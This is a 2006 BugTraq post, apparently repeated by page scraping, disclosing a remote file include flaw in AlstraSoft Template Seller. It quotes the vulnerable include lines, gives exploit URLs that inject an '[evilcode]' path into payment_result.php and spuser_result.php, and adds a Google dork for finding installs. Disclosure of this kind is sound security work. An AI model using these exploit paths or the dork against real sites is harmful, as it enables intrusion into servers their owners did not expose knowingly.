BugTraq
Back to list
|
Post reply
SolpotCrew Advisory #7 - AlstraSoft Template Seller Remote File Include Vulnerability
Sep 01 2006 06:24PM
jong_amq hotmail com
#############################SolpotCrew Community################################
#
# AlstraSoft Template Seller Remote File Include Vulnerability
#
# Download file : http://www.alstrasoft.com/template.htm
#
########################################################################
#########
#
#
# Bug Found By : NoGe a.k.a da_jackass
#
# contact: jong_amq (at) hotmail (dot) com [email concealed]
#
# Website : http://nyubicrew.org/adv/Noge_adv_01.txt
#
########################################################################
########
#
#
# Greetz: skulmatic[thanks for sharing knowledge] h4ntu[for the video] olibekas solpotcrew PremanMedan
# yooogy[pa bozz] siwa^lima sagu mousekill ilalang13
# #papmahackerlink #nyubi #maluku-hacker #papuahacker
#
########################################################################
#######
# Vulnerable found in
payment_result.php and spuser_result.php
line 6 include("$config[template_path]/onlyheader.php");
line 7 include("$config[template_path]/onlysearch.php");
# Exploit
/payment/payment_result.php?config[template_path]=[evilcode]
/payment/spuser_result.php?config[template_path]=[evilcode]
# google dork
"Powered by AlstraSoft Template Seller"
######################################E.O.F#############################
#####
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#
# AlstraSoft Template Seller Remote File Include Vulnerability
#
# Download file : http://www.alstrasoft.com/template.htm
#
########################################################################
#########
#
#
# Bug Found By : NoGe a.k.a da_jackass
#
# contact: jong_amq (at) hotmail (dot) com [email concealed]
#
# Website : http://nyubicrew.org/adv/Noge_adv_01.txt
#
########################################################################
########
#
#
# Greetz: skulmatic[thanks for sharing knowledge] h4ntu[for the video] olibekas solpotcrew PremanMedan
# yooogy[pa bozz] siwa^lima sagu mousekill ilalang13
# #papmahackerlink #nyubi #maluku-hacker #papuahacker
#
########################################################################
#######
# Vulnerable found in
payment_result.php and spuser_result.php
line 6 include("$config[template_path]/onlyheader.php");
line 7 include("$config[template_path]/onlysearch.php");
# Exploit
/payment/payment_result.php?config[template_path]=[evilcode]
/payment/spuser_result.php?config[template_path]=[evilcode]
# google dork
"Powered by AlstraSoft Template Seller"
######################################E.O.F#############################
#####
[ reply ]